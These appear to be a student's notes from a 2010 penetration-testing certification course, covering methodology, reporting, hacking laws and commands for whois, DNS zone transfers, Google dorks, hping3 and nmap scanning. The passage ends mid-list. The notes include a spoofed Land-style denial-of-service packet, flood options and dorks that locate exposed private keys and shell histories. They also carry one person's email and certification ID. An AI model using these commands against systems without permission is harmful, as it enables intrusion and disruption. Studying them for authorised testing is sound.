5/17/2010 through 5/22/2010

Application Confirmation

Your GIAC Certification Application submission has been completed successfully. Please include the following in all your e-mails if you should require help: Your portal e-mail address is steve.edwards@vt.edu and your SD Number is 875787. Thanks!

Cain --4.111
Command Injection --5.150
Command Shell vs. Terminal Access --3.88
Cross Site Request Forgery --5.106
Cross Site Scripting --5.124
Enumerating Users --2.155
Exploitation Fundamentals
Finding Vulnerabilities with Search Engines --1.192
John the Ripper --4.90
Legal Issues --1.118
Metasploit --3.20
Moving Files with Exploits  --3.135
Network Sweeping and Tracing --2.20, 2.40
Nikto --5.79
Non-Metasploit Exploits 
Obtaining Password Hashes --4.175
OS and Version Detection --2.88
Paros --5.89
Pass-the-Hash Attacks --4.159
Password Attack Fundamentals --4.24
Password Formats --4.62
Password Guessing with THC-Hydra --4.48
Pen-testing Foundations 
Pen-testing Methodologies and Infrastructure --1.25 --1.31
Pen-testing Process --1.68
Pen-Testing via the Windows Command Line --3.147
Pen-testing with Netcat --2.168 3.125
Port Scanning --2.49
Rainbow Tables --4.133
Reconnaissance Foundations --1-132
Reconnaissance Using WHOIS and DNS --1-136
Reporting the Results --1.103
Running Windows Commands Remotely --4.3
Scanning Fundamentals --2.3
SQL Injection --5.162
Vulnerability Scanning --2.109
Web-based Reconnaissance
Wireless Crypto and Client Attacks --5.37 --5.64
Wireless Fundamentals --5.3

• The Mindset of a Penetration Tester and Ethical Hackers ..1.5

• Threat
• Vulnerability
• Risk
• Exploit

• Ethical Hacking
• Penetration Testing
• Security Assessments (and Vulnerability Assessments)
• Security Audits

• Network Services Test
• Client-side test
• Web application test
• Remote dial-up war dial test
• wireless security test
• Social Engineering test

• Physical security test
• Stolen equipment test
• Cryptanalysis attack
• Shrink-wrapped software test

• Reconnaissance
• scanning
• Exploitation
• Maintaining access with backdoors and rootkits
• Covering tracks with covert channels and log editing

• Configuration review
• Architecture review
• Interviews with target environment personnel
• Detailed audits

• Open Source Security Testing Methodology Manual (OSSTMM)
• NIST Special publication 800-42: Guideline to Network Security Testing
• Open Web Application Security Project (OWASP) Testing Guide
• Penetration Testing Framework

• http://www.isecom.org/osstmm

• http://csrc.nist.gov/publications/nistpubs/800-42/NIST-SP800-42.pdf
  • appendices cover: nmap l0phtcrack, tripwire, LANguard, snort, and nessus

• www.owasp.org/index.php/OWASP_Testing_Guide_v2_Table_of_Contents
• gets quite deep into techniques and tools

• www.vulnerabilityassessment.co.uk/Penetration%20Test.html
• very deep with specific tools and commands

• Backtrack
• http://www.backtrack-linux.org/

• http://Inj3ct0r.com (formerly Milw0rm)
• http://packetstormsecurity.org

• don't use nat because during rapid testing, the nat table can fill up and loose packets

Linux shred overwrites files with alternating zeros and ones to delete them

# shred

On Windows, cipher shreds unallocated space of the partition of which the directory resides, it does not overwrite the directory or contents.

c:\> cipher /w:<dir name>

dban

Journaling files system is not removed with the tools. Using the machine a couple of days will wipe it out.

• Preparation
  • Nondisclosure Agreement if applicable
  • Discuss nature of test with target personnel
  • Sign off on permission and notice of dager of testing
  • Assign Team
• Testing
  • Conduct the test
• Conclusion
  • Reporting and (possible) penetration

• www.counterhack.net/permission_memo.html

• Executive Summary
• Introduction ..1.109
• Methodology ..1.110
• Findings ..1.111
  • High-Risk
  • Medium Risk
  • Low Risk
• Conclusions ..1.116
• (Optional) Appendicies ..1.117

• Most important part
• 1-1.5 pages
• Very briefly summarize project
• Then summarize overall risk posture identified during test
• Finally, include bulleted listof three to six significant findings
• mediocre test with good executive summary may be more valuable than a good test with a mediocre executive summary

• Cyber Security Enhancement Act of 2002
  • Pretty severe penalties! Possible life in prison for attacker who “recklessly causes or attempts to cause death”
• Title 18, P 1362: Communication lines, station or systems
  • Prohibits malicious injury or destruction of communications equipment, with fines and imprisonment up to 10 years
• Title 18, P 2510 et seq:Wire and Electronic Communications Interception and Interception of Oral Communications
  • Prohibits unauthorized interception of electronic communications
  • Allows service providers to monitor network to keep it running
  • Specifies procedures for law enforcement to apply for court order
• Title 18, P 2701 et seq: Stored wire and electronic communications and transactional records access
  • Prohibits access to stored information without permission of owner
  • Exceptions for service provider and intended recipient

• Criminal Code of Canada, Section 184: Interception of Communications
• Criminal Code of Canada, Section 342: Unauthorized Use of Computer

• Computer Misuse Act of 1990

• Penal Code Section (Strafgesetzbuch, StGB) 202a, Data Espionage
• Section 202c, referred to as the “Anti-Hacking Law”
• Section 303a: Alteration of Data
• Section 303b: Computer Sabotage

• The Cybercrime Act of 2001

• Law No. 128 of 1999: Unauthorized Computer Access Law

• Chapter 50a: Computer Misuse Act

• Revealed by target organization personnel
• Google search
• DNS Zone transfer
• DNS Reverse Lookup
• Discovered during Network Sweep
  • ICMP
  • TCP Port
  • UDP Port
• Discovered during wireless Assessment or Physical Assessment
• Discovered by compromise of one host, allowing scans to find other targets
• others

• information about targets Internet gateways
• Start with InterNIC
• Web Based
  • www.samspade.org
  • www.geektools.com
  • www.whois.net

• www.internic.net/whois.html

• many Linuxes, the whois command actually invokes the jwhis program

whois [-h whis_server] name

• RIRs - Regional Internet Registries
  • ARIN - American Registry for Internet Numbers - North America
  • RIPE NCC - Reseaus IP Europeens Network Coordination Centre - Europe, the Middle East, and part of Central Asia
  • APNIC - Asia Pacific Network Information Centre - covers Asia-Pacific region
  • LACNIC - Latin American and Caribbean Internet Address Registry - Latin America and most of the Caribbean
  • AfriNIC - Africa

• http://ws.arin.net/whois/
• specify company name or IP address
• Can specify record types
  • n: network address space
  • a: autonomous system
  • p: point of contact
  • o: organization
  • @ [domain_name]: match e-mail address
• ASN
• BGP

n microsoft
a microsoft

p microsoft
@ microsoft.com

• Using Search Engines, Determine organization's:
  • Major Businesses
  • Major Products or services
  • Corporate officers and other VIPs
  • Major competitors
  • Physical Locations
  • Recent Press releases

• types of skills being sought indicate technologies being used
  • Web server type
  • Web Application dev environment
  • Firewall type
  • Routers
• Google searches
  • site:[companydomain] careers
  • site:[companydomain] jobs
  • site:[companydomain] openings
• Job related sites
  • www.hotjobs.com - search on Technology and Telecomm categories
  • www.monster.com - Search on Info Tech, Internet/E-commerse, and Telecomm

• LinkedIn
• Facebook
• Twitter
• MySpace
• Orkut
• people.yahoo.com
• www.google.com/profiles?q=
• google phonebook

phonebook:[name] [state]

• check profiles for coding skill, environment, networking capabilities, kinds of systems they administer.
• Robin Wood's gpscan.rb tool searches foogle Profiles to find all people associated with a given company
• Jason Wood's Teconnoiter scripts harvest names from social networking sites and make variations for potential user names.

• Useful information:
  • Fuser names
  • Files system paths
  • Email addresses
  • Clent-side software
  • Undoo data, previous revisions, hidden or obsscured fields, etc.

• pdf
• doc, dot, and docx
• xls, xlt, xlsx
• ppt, pot, pptx
• jpg and jpeg
• html and htm ( e.g., comments and hidden form elements)
• others

• review docs sent
• ask for docs in different formats
• pull documents from website using a web spider
• In-house penetration testers can often harvest documents from fileserver

• exiftool
• FOCA
• Metadata Extraction Tool by the National Library of New Zealand (NLNZ)
• strings
• others

• by Phil Harvey
• http://www.sno.phy.queensu.ca/~phil/exiftool/
• Windows, Linux, or Mac
• recursion

• useful for unstructured data
• 16-bit big endian Unicode
  • -e b
• 16-bit little endian Unicode
  • -e l
• four characters by default, to change:
  • -n [minlen]
• sysinternals strings
  • looks for both ASCII and Unicode
  • searches for both big endian and little endian by default
  • for just ASCII
    • -a
  • for just Unicode
    • -u
  • three charaters by default, to change:
    • -n [minlen]

• WidgetStatisticalAnalysis.xls
• WidgetStatisticalWhitepaper.doc
• WidgetStatisticalWhitepaper.pdf

• Exclude (Restrict) files:

wget -nd -r -R htm,html,php,asp,aspx,cgi -P /home/tools/560metadata_ex [target_domain]

• Include (Allow) files:

wget -nd -r -A pdf,doc,docx,cls,xlsx -P /home/tools/560metadata_ex [target_domain]

• Options used:
  • -nd: No directories (Place all files in specified directory)
  • -r: Recursive download
  • -P [directory]: Prefix output file locations with [directory]
  • -R/A: Restrict or allow file types or patterns

# cp /home/tools/560metadata_ex/Widget* /tmp

• a copy is also in the Windows directory of the DVD

# exiftool [filename]

# exiftool WidgetStatisticalAnalysis.xls
# exiftool WidgetStatisticalWhitepaper.doc
# exiftool WidgetStatisticalWhitepaper.pdf

# strings [filename]

# strings WidgetStatisticalAnalysis.xls
# strings WidgetStatisticalWhitepaper.doc
# strings WidgetStatisticalWhitepaper.pdf

• Look for little endian unicode

# strings -e l WidgetStatisticalAnalysis.xls |grep '\\'

• Look for big endian unicode

# strings -e b WidgetStatisticalAnalysis.xls |grep '\\'

• At the end of the whois information, we have a listing of the target organization's DNS server(s)
• DNS records:
  • NS: Nameserver record, which indicates the name servers associated with a given domain name.
  • A: Address record, which maps a domain name into an address.
  • HINFO: Host Information record, which associates an arbitrary set of information with a domain name, formerly used to indicate system types.
  • MX: Mail Exchange record, which includes an arbitrary text string for the domain.
  • TXT: Text record, which includes an arbitrary text string for the domain.
  • CNAME: Canonical Name record, which indicates aliases and alternative names for a given host.
  • SOA: Start of Authority record, which indicates that a server is authoritative for that DNS zone (set of records).
  • RP: Responsible Person records….
  • PTR: Pointer for inverse lookups recordalso called a reverse record, indicating an IP address to domain name mapping.
  • SRV: Servoce ;pcatopm recprds, which provides information about available services, including port and hostname (seldom used).

• zone transfer ability removed from Linux command, but still works in Windows.

nslookup www.sans.org

• interactive mode

nslookup
> www.sans.org

• Resolve an individual name or IP address

> [name or IP addr]

• Use a different DNS Server

> server [serverIPaddr or name]

• Say that we're interested in all types of records

> set type=any

• Perform a zone transfer of all records for a given domain

> ls -d [target_domain]

• Store zone transfer output in a file

> ls -d [target_domain] [> filename]

• view file

> view [filename]

> set norecurse
> set recurse

• Cache snooping is resolving addresses without re-cursing up to authoritative server

• nslookup command in modern Linuxes cannot perform a zone transfer, but dig can

dig @[server] [name] [type]

-t specifies zone transfer

• full zone transfer:

-t AXFR

• Incremental zone transfer:

-t IXFR=N

• N is an integer that refers to the serial number of a Start of Authority record. The incremental zone transfer request will pull all records that have changed since the SOA aerial number was the N we specified in our dig request.
• Toggle recursion on and off

+norecursive
+recursive

dig @10.10.10.45 target.tgt -t AXFR

• www.dnsstuff.com

• Bi-directional Link Extractor

• Uses a scriptable browser called HTTrack to access web sites

$ ./BiLE [target] [results_file]

• then crawls the target site, fetching every page
  • It searches pages to find links to other sites
  • It then crawls those sites, searching for links
• searches Google with link:[target] search, to find sites linked to the target
• Produces a big output file of form [Source_site]:[Destiniation_site] containing potentially interesting related sites

• starts with the output from BiLE

$ ./BiLE-weigh.pl [site_of_interest] [BiLE_output.mine]

• applies complex weighting algorithm to determine which sites are related to a given target of interest.
• A relative score is assigned to each site, based on how it relates to other sites

• The tld-expand.pl script takes a list of domain names and appends over 250 Top-Level-Domain suffixes to them, looking them up in DNS to determine if they are valid
• Output is list of valid full domain names

• The vet-IPrange.pl script then looks up all domain names discovered by BiLE, ranked by BiLE-weigh, and identified by exp-tld, and looks up their IP addresses

• qtrace.pl uses Hping to traceroute to all target IP addresses listed in a file, such as the output of vet-IPrange.pl
• vet-mx.pl looks up the Mail eXchanger (MX) record for each domain name listed in a file

• BiLE → BiLE-weigh → exp-tld → vet-IPrange & vet-mx → qtrace

• helpful in getting information from DNS even when zone transfers are blocked
• Jarf-rev takes a target network range and performs reverse DNS lookups on all names in the range
• Jarf-dnsbrute takes a given domain and a file containing words, then performs a DNS lookup on each domain name
  • can generate a huge amount of DNS queries

• by Paterva
• General purpose recon tool
• http://www.poaterva.com/maltego
• commercial and community edition
• $430/year
• 15-sec nag screen, can't save results, limits zoom, limited to 75 transforms a day
• Uses “transforms” to look up information
  • Domain name to IP address (dns)
  • IP address to org name (netblock)
  • Org name to person's name (whois)
  • Person's name to PGP key (Public key servers)
  • PGP key to person's name (who signed the key?)
  • Persons' names to phone numbers (phone lookup)

• Searches only within a given site

site:www.counterhack.net wireless

• Shows all sites linked to a given site

link:www.counterhack.net

• Shows similar pages - sometimes useful, sometimes not

related:insecure.org

• Shows pages whose title matches the search (index.of) (with passwd on page) (conbine with site: to restrict search

intitle:index.of passwd

• Shows pages whose URL matches the search criteria

inurl:viewtopic.php

• search for a given file type.
• google sometimes mistakes a fiven file type, so it is good to include the file suffix as a general search term
• filetype: and ext: are synonymous

site:counterhack.net filetype:ppt
site:counterhack.net etc:ppt

more general:

site:counterhack.net ppt

• Johnny Long maintains a huge inventory of Google searches that can find vulnerable systems at

johnny.ihackstuff.com

• Advisories and vulnerabilities*
• Error messages
• Files containing juicy info*
• Files containing passwords*
• Files containing usernames
• Footholds*
• Login portals
• Network or vuln data*
• Sensitive directories
• Sensitive on-line shopping info*
• On-line devices*
• Vulnerable files
• Vulnerable servers*
• Web server version detection

• PGP and GnuPG private key rings:

intitle:index.of intext:”secring.skr”|”secring.pgp”|”secring.bak”

• Shell history files in interesting domains:

site:somethinginteresting intitle:index.of bash_history

• Robots.txt file with excessive disallow lines:

robots.txt disallow filetype:txt

• Nessus scan results:

intitle:”Nessus Scan Report” “This file was generated by Nessus”

• wikto for Windows
  • www.sensepost.com/research/wikto
  • spiders wegsite, scans for vulnerable web scripts, and more
  • wikto uses AURA proxy to map SOAP-style request to human usable Google website, which violates Google's terms of service.
• cDc's Goolag
  • www.goolag.org
  • Uses GHDB, but easily expanded with XML
  • also can be banned by Google
• GnuCitizen's GHDB Scanner
  • Entirely web based. no download necessary
  • www.gnucitizen.org/ghdb/
  • requires Firefox of Safari

• Determine network addresses of live hosts, firewalls, routers, etc. in the network
• Determine network topology of target environment
• Determine operating system types of discovered hosts
• Determine open ports and network services in target environment
• Determine lists of potential vulnerabilities
• Do these in a manner that minimizes risk of impairing host or service

• Network sweeping
• Network tracing
• Port Scanning
• OS fingerprinting
• Version scanning
• Vulnerability scanning

• Network sweeps
  • Network Tracing
    • Port Scans
      • OS fingerprinting
        • Version scans
          • Vulnerability scans

• with port 0, there are 65536 TCP ports and 65536 UDP ports
• 1 second for each port would require a considerable amount of time to scan

• sample a subset of machines, looking for representative targets
• sample target ports
  • TCP 21,22,23,25,80,135,137,139,443,445, etc
• Review network firewall ruleset and measure only those ports that could reasonably make it through the firewall

• Tweak firewall rules to sen RESETs and ICMP Port Unreachable messages from closed ports
• Use Hyperfast port scanning methods
  • Large number of machines, and/or
  • Much faster packet send-rate from existing machine, lowering time outs (bu may lose packets, and/or
  • Moving closer to targets, near high-bandwidth backbone, and/or
  • Very fast scanning tools, like those featured in Dan Kaminsky's ScanRand
  • Downside: You could create a denial of service attack
    • Be careful of network bottlenecks in attacking and targeting infrastructure!

• not to capture packets, but to visualize the scan as it happens

• opensource
• www.tcpdump.org
• ported to windows as WinDump
• www.winpcap.org/windump/default.htm

Tip: Helpful tcpdump Options to Use While Scanning ..2.17

$ sudo tcpdump

  -n: use numbers instead of names for machines
  -nn: Use numbers instead of names for machines and ports
  -i [int]: Sniff on a particular interface (-D lists interfaces)
    -D shows a list of interfaces
  -v: Be verbose (print TTL, IP ID, Total Length, IP options, etc.)
    -v and -vv show even more information
  -w: Dump packets to a file 9use -r to read file later)
  -x: Print hex
  -X: Print hex and ASCII
  -A: Print ASCII (Doesn't work in all versions, consider -X instead)
  -s [snaplen]: Snarf this many bytes from each packet, instead of the default of 68 for most Oss, -s grabs entire packets

• Protocol

ether
ip
ip6
arp
rarp
tcp
udp

• Type

host [host]

net [network]
port [portnum]
portrange [start-end]

• Direction

src: only packets from that host or port

dst: only packets to that host

• Use “and” or “or” to combine these together

• Show TCP packets against target 10.10.10.10 in ASCII and HEX

tcpdump -nnX tcp and dst 10.10.10.10

• Show all UDP packets from 10.10.10.10

tcpdump -nn uds and src 10.10.10.10

• Show all TCP port 80 packets going to or from host 10.10.10.10

tcpdump -nn tcp and port 80 and host 10.10.10.10

• By default, sends TCP packets with no control bits set to target port 0 continuously, once per sercond,
  • possibly getting resets back

hping3 10.10.10.20

--udp: send UDP packets
--icmp: send ICMP packets
--rawip: send raw IP packets, with no TCP or UDP component

# hping3 --rawip 10.10.10.20

• most systems will silently reject a raw IP message.

• By default, Hping sets all TCP Control Bits to zero
• supports simple syntax to choose control bits

--syn
--fin
--rst
--push
--ack
--urg

• Will send packets to random targets whereever an x is included in the IP address. Targets are repeated randomly

--rand-dest IP_addr

• When using the random destination option, you must specify which interface to send the packets on

--interface [Int]

# hping3 --rand-dest 10.10.10.x --interface eth0

• sets spoofed source OP address of all packets sent

hping3 –spoof 10.10.10.10 10.10.10.20

• Randomly selects a source address for all packets

--rand-source

• no way to specify a range
• still useful for stress testing stateful firewalls
• May fill up a stable table, causing additional packets for other users to be dropped

• Use this destination port

--destport [port]

• If preceded by a +, port is incremented by 1 for each response received
• If preceded by a ++, port is incremented by 1 for each packet sent

• Scan this target range or list of ports

--scan [port_range/list]

• Start with this source port, incrementing for each packet sent

--baseport [port]

• use only a single source port for all packets sent

--keep

• Send only N packets:

--count [N]

• Beep when a packet is received

--beep

• send contents of file as payload, bust be used with –data

--file [filename]

• Length of payload to send, in bytes (if no –fie, payload is Z's)

--data [N]

• send 10 packets per second

--fast

• send 1,000,000 packets per second (if possible)

--faster

• send packets as fast as possible, perhaps even faster than they can be displayed

--flood

• send packets every N seconds (or every uN microseconds)

--interval [N]
--interval u[N]

• iterate through an address space using Linux

for i in `seq 2 254`; do hping3 --count 1 10.11.11.$i; done

• only print systems that respond

for i in `seq 2 254`; do hping3 --count 1 10.11.11.$i 2>/dev/null | grep ip=; done

• Configure tcpdump to display all packets with your machine's IP address and the IPaddress of target machine 10.10.10.20, in either direction
• Run Hping against 10.10.10.20 with no options
• In your sniffer output:
  • What is the default Layer 4 protocol?
  • What is the default source port? How could you make it a fixed number?
  • What is the default destination port?
  • What kind of response do you see?

hping3 10.10.10.20
tcpdump -nn host [yourLinuxIPaddr] and host 10.10.10.20

• we can infer that the layer 4 protocol is TCP, because only TCP has control bits
• incrementing source ports. –baseport [port] –keep
• default dest port 0
• RESET (R) and ACK (ack) from target and ICMP unreachable from source machine

• Run tcpdump configured to show only ICMP messages, in Hex and ASCII format, without resolving names
• Use the standard ping command to ping 10.10.10.20 to verify your configuration

Create a file containing some text

# echo helohelohelo > test.txt
* Use hping to send that file to the target via ICMP Echo Request payloads
View the payloads in the responses... it truly is an echo

tcpdump -nnX icmp
hping3 –icmp –data 40 –file test.txt 10.10.10.20

• Land attack
  • Source IP addr = dest IP addr = target addr
  • Source port = destination port = open port on target
• Using Hping, create a single Land-style attack for 10.10.10.20 on TCP port 80

hping3 –-count 1 –-baseport 80 –-destport 80 –-syn –-spoof 10.10.10.20 10.10.10.20

• test beep

echo -e “\x07”

• Invoke Hping to ping 10.10.10.20 with ICMP at an interval of every 10 seconds

hping2 –icmp –interval 10 –beep 10.10.10.20

• Traceroute - Linux/Unix
• Tracert - Windows
• Packet sent with TTL of 1 causing the next router to send ICMP TTL Exceeded
• Increments TTL until the destination is reached
• No response from a router is usually indicated by a *

• sends UDP packets with incrementing ports starting at base port of 33434, going up by one prot for each probe packet sent (each hop measured three times)
• Some useful options:

-f[N]: set initial TTL for the first packet
-g [hostlist]: Specify a loose source route (8 maximum hops)
-I: Use ICMP Echo Request instead of UDP
-m [N]: Set the maximum number of hops
-n: Print numbers instead of names
-p [port]: Set the base UDP port (default base is 33434, which is incremented for first packet, and for each subsequent packet, with each hop measured three times)
-w [N]: Wait for N seconds before giving up and writing * (default is 5)

tcpdump -v -nn udp
traceroute -n 64.112.229.131

• sends ICMP Echo requests
• Some useful options:

-d: Don't resolve names
-h [N]: Maximum number of hops (default is 30)
-j [hostlist]: Use loose source routing, with a space-separated list of router IP addresses (up to 9 max) -w [N]: Wait for N milliseconds before giving up and writing a * (default is 4000)

• These tools rely on getting an ICMP Time Exceeded message back
• If ICMP Echo Request is blocked, Windows tracert has problems
• If high UDP packets are blocked, Linux/Unix tracerout has problems
• other tools
  • LFT
  • 3D Traceroute
  • Web based
  • mtr, a Linux command that combines ping and traceroute using ncurses interface

• Free at http://pwhois.org/lft for Linux and Unix
  • Use TCP (default), UDP (-u), or ICMP Echo Request (-p)
  • Choose destination port (-d [port]), default for TCP is 80
  • Choose source port (-s [port])
  • Set Chosen length (-L [N]) including layer 3 and 4 header lengths
  • Looks up AS number (-A) using various whois servers
• Also supports RFC 1393 Tracerout via IP options (-P)
  • not widely implemented in routers

• www.traceroute.org
• www.kloth.net/services/traceroute.php
• www.net.cmu.edu/cgi-bin/netops.cgi
• www.tracert.com

• Most services on the Internet are TCP or UDP
• TCP: Connection oriented, tries to preserve sequence, retransmits lost packets
• UDP: Connectionless, no attempt made for reliable delivery

• Contol Bits, aka “Control Flags” or “Communications Flags”
• 6 traditional ones with 2 newer extended ones for congestion control

• tcp three way handshake used to exchange sequence numbers that will be applied in increasing fasion for all follow-on packet for that connection
• SYN, SYN-ACK, ACK
• Exchange ISN's, initial sequence numbers

• According to TCP specs (RFC 793)…
• …if something is listening on a TCP port…
• …and a SYN arrives on that port…
• …the system responds with a SYN-ACK…
• …regardless of the payload of the SYN packet
• That gives us a reliable indication of which ports are listening

• Case T1: SYN in, SYN-ACK back – Easy: The port is open
• Case T2: SYN in, RST-ACK back – Easy: The port is closed (or a firewall is blocked it)
• Case T3: SYN in, ICMP port Unreachable back – The port is inaccessible, likely blocked by a firewall (on network or end system). Nmap marks as “filtered”
• Case T4: SYN in, nothing back – The port is inaccessible, likely blocked by a firewall (on the network or end system). Nmap marks as “filtered”.

• Resets or ICMP Port Unreachables back cause the scan to go much faster
• Nothing back causes it to take a lot more time waiting for a timeout

• UDP is far simpler protocol without trackin of stat of a “connection”
• Less options, often slower, and less reliable.

• Case U1: UDP in, UDP back – Easy, the port is open
• Case U2: UDP in, ICMP port unreachable back – Easy, the port is closed (or a firewall blacked it)
• Case U3: UDP in, nothing back –
  • the port is inaccessible
    • Port is closed
    • Firewall is blocking inbound UDP probe packet
    • Firewall is blocking outbound response
    • Port is open, but it was looking for specific data in UDP payload. Without the Data, no response was sent
  • Nmap marks as open|filtered

• primarily a port scanner showing which tcp and udp ports are open
• Nmap Scripting Engine extends nmap to a general purpose vulnerability scanner
• ping sweeps
• operating system fingerprinting
• tracerouting and much more

• Run Nmap with –packet-trace to display summary of each packet before it is sent, with output that includes:
  • Nmap calles to the OS
  • SENT/RCVD
  • Protocol (TCP/UDP)
  • Source IP:Port and Dest IP:Port
  • Control Bits
  • TTL
  • Other header Information

nmap -PN -sS 10.10.0.1 -p 1-1024 –packet-trace

• -PN Don't Ping, just scan
• -sS SYN scan or Half-Open Scan
• - -packet-trace display status and packet summary information

• the following keys while running display status
  • p = turn on packet tracing
  • v = increase verbosity
  • d = Increase debugging level
  • Shift with any of the above inverts it
  • Any other key prints status message
    • Elapsed time, hosts completed so far, number of hosts up, number of hosts currently being scanned
    • percentage done, estimate of amount of time remaining

• By default, Nmap has a dynamic timing model that adapts scan timeouts based on performance of initial packets
• -T [timing options] [other options]
  • 0: Paranoid - waits 5 minutes between packets, scans serially
  • 1: Sneaky - 15 seconds between packets, scan serially
  • 2: Polite - 0.4 seconds between packets, scan serially
  • 3: Normal - default, desired to not overwhelm network of miss targets/ports, scans in parallel
  • 4: Aggressive - spends up to 5 minutes scanning each host, waits only 1.25 seconds for probe response, scans in parallel
  • 5: Insane - Spends up to 75 seconds per host, waits only 0.3 seconds for probe response, scans in parallel

• More timing options
  • - -host_timeout: Max time spent on single host before moving on; default is no host timeout
  • - -max_rtt_timeout: Mac time to wait for probe response before retransmitting or timing out; default is 9 seconds
  • - -min_rtt_timeout: To speed up a scan, Nmap measures timing of target and lowers timeouts to match its network behavior, speeding up a scan but possibly missing responses; this option can be set so that timeouts don't go below a given value
  • - -initial_rtt_timeout: Sets the initial timeout for probes, which will be lowered automatically as Nmap measures the network performance of a target; default is 6 seconds.
  • - -max_parallelism: Sets the number of probes Nmap will send in parallel (1=serial)
  • - -scan_delay: sets minimum time Nmap waits between sending probe packets

• by default, Nmap probes a target address before scanning it
  • For UID 0 users, Nmap sends:
    • If on same subnet as Nmap box, just send ARP request
    • (the following All sent immediately, not waiting for response between each packet)
      • If on different subnet, send ICMP Echo Request, and
      • TCP SYN to port 443, and
      • TCP ACK to port 80, and
      • ICMP Timestamp Request (Type 13)
  • For non-UID 0 users, Nmap initiates 3-way handshake by sending:
    • TCP SYN to port 80, and…
    • TCP SYN to port 443
  • These packet combinations are based on statistical analysis of actual systems thta respond on large networks and the Internet.
• Nmap with the -PN option (same as -P0) will not ping a target before scanning it.

• probe for target hosts, launching a network sweep scan

nmap -sP [options]

• Choose network sweep options based on what is allowed into the target network, measured by sending test probes using different protocols
• Nmap has the following sweep types:
  • PN: Don't ping (also -P0)
  • -PB: Sames as default, use ICMP Echo Request, SYN to TCP 443, ACK to TCP 80, and ICMP Timestamp Request (if UID 0)
  • -PE (formerly -PI): Send ICMP Echo Request (ICMP type 8)
  • -PS[portlist]: Use TCP SYN to specified ports in the port list (e.g., -PS80)
  • -PP: Send ICMP timestamp request (ICMP type 13) to find targets.
  • -PM: Send ICMP address mask request (ICMP type 17) to find targets
  • -PR: use ARP to identify hosts (only works with hosts on same subnet)
    • used by default for targets in the same subnet as scanning host

• - -traceroute
• Nmap determines the types of packets (ICMP, TCP with a specific port, UDP with a specific port) that are likely to be allowed through the network to the target.
• Then it traceroutes to the target using those packets
• Goes backwards for efficiency
• sends out a packet with a high initial TTL based on a guess associated with the can results so far
  • If it gets a response from the end host, it lowers the TTL
  • If it gets an IXMP Time Exceeded, it raises it
  • It does that until it know the exact number of hops to target
  • Then, it works its way backwards to decrement down to 0
  • The efficiency is in scanning other hosts in the same route

• Does not check all ports by default
• By default, Nmap checks the top 1000 most used ports for TCP and/or UPD
  • does not check all ports less than 1024 by default anymore
• -F option (which stands for fast) says to scan the top 100 ports
• - -top-ports [N] option tells Nmap to scan for the N most popular ports
• For a comprehensive scan, use te -p option
  • -p 0-65535 will scan all ports
  • -p 22,23,25,80,445 will check only those ports
  • the flag T: or U: can be included in the list to specify TCP or UDP
    • -sU -sT -p U:53,111,137,T:21-25,80,139,8080
• Ports scanned in random order, but -r makes them not randomized

• Most TCP scans are based on control bits
• TCP connect scan is most straightforward
  • nmap -sT
  • Completes three-way handshake
  • Connection then torn down by using RESET
  • Slower, more likely to be logged
  • Less control for Nmap, because it uses OS connect() call
  • Can run with or without root or admin privileges

• Syn scan, sometimes called “half-open” or “SYN Stealth” scan, involked with -sS
  • nmap -sS
  • SYN-ACK response = open
  • RST response = closed
  • no response = filtered
• Often not logged on the end system because there is no connection
• Firewalls, IDS sensors, and IPS tools may still detect it
• Requires root privileges
• SYN →
• ← SYN-ACK
• RESET →

• ACK Scan (-sA)
  • Useful in scanning through an “established” filter on a router
  • But, doesn't reliably tell us if a port is open or closed…instead, it is useful for identifying hosts (network mappings)
• FIN Scan (-sF)
  • Set FIN bit of all scan packets
• Nmap Null Scan (-sN)
  • Set all control bits to 0 (Null)
• Nmap Xmas Tree Scan (-sX)
  • Set FIN, PSH, and URG
• Maimon Scan (-sM)
  • Set FIN and ACK bits

• To generate flags with your own desired TCP Control Bits, use:
  • - -scanflags [URG,ACK,PSH,RST,SYN,FIN,EXE,CWR,ALL,NONE]

nmap –scanflags SYNPSHACK -p 139 10.10.10.10

• Far less options than with TCP
• Invoked with -sU option
• Sends UDP packet with no payload to target
• Attempts to detect response ICMP rate limiting in target, and slows down
  • Can really stretch out scan time
  • Remember, closed ports may respond with ICMP Port Unreachable
  • Linux will only send 1 per second
  • For 65536 ports, that's over 18 hours for a single target machine!

• Using Nmap with –badsum at the command line will generate packets with an invalid TCP or UDP checksum
• End systems will reject these packets, silently dropping them
• But, some firewall and ISP's do not calculate layer 4 checksums
  • they may send a RESET or ICMP Port Unreachable
  • Therefore, if any responses come back, it came from a firewall or IPS

• Run a ping sweep of our local network

# nmap -n -sP 10.10.10.10.1-255 --packet-trace

• While it is running, hit the following keys
  • Shift-p = turn off packet tracing
  • p = Turn it back on
  • v = Increase verbosity
  • Shift-v = Turn it off
  • d = Increase debugging level
  • Shift-d = Turn it off
• Note that your are just sending ARPs; no ICMP or HTTP
  • Nmap is smart enough to do the because you are on the same LAN

• show traffic associated with host

# tcpdump -nn host 10.10.10.50

• do a TCP connect scan (full three-way handshake) (top 1000 ports by default)

# nmap -n sT 10.10.10.50

• let's see how long it takes to scan all TCP ports

# nmap -n -sT 10.10.10.50 -p 1-65535

• in the above scan, we omitted TCP port 0. Let's test that one port:

# nmap -n -sT 10.10.10.50 -p 0

• a list of ports

# nmap -n -sT 10.10.10.50 -p 21,22,23,25,80,135,443,6000

• review port in the nmap-services file

# gedit /usr/share/nmap/nmap-services

# nmap -n -sU 10.10.10.50
# nmap -n -sU 10.10.10.50 -p 53,111,414,500-501

• tells why Nmap classifies a given port's open/closed/filtered state as it does

# nmap -n -sU 10.10.10.50 -p 53,111,414,500-501 --reason

• scan TCP and UDP at the same time

# nmap -n -sT -sU 10.10.10.50 -p 21-25 --reason

• Run a “normal” SYN scan of 10.10.10.10

# nmap -n -sS 10.10.10.10

• Run the same scan, but with a bad checksum

# nmap -n -sS 10.10.10.10 --badsum

• Why much slower? Resets are normally returned, but with badsum, packets are dropped.

• to examine the timing of above, run tcpdump

# tcpdump -nn host 10.10.10.10
# nmap -n -sS 10.10.10.10
# nmap -n -sS 10.10.10.10 --badsum

• RESETS really help speed up a SYN Scan
• No RESETS sent with bad checksum
• If we do get a RESET, Nmap is smart enough to know it came from a firewall, and prints out “closed” instead of “filtered”

• Nmap attempt to determin the operating system of target by sending various packet types and measuring the response
• Different systems have different protocol behaviors that we can trigger and measure remotely
• Besides Nmap, another tool focused just on active fingerprinting is Xprobe2 by Ofir Arkin
  • http://sys-security.com/xprobe

• first generation nmap fingerprinting has been removed and replaced with second generation capability
• -O and -O2 (-O1 has been removed)

• Over 30 different methods are included in the second generation fingerprinting, including:
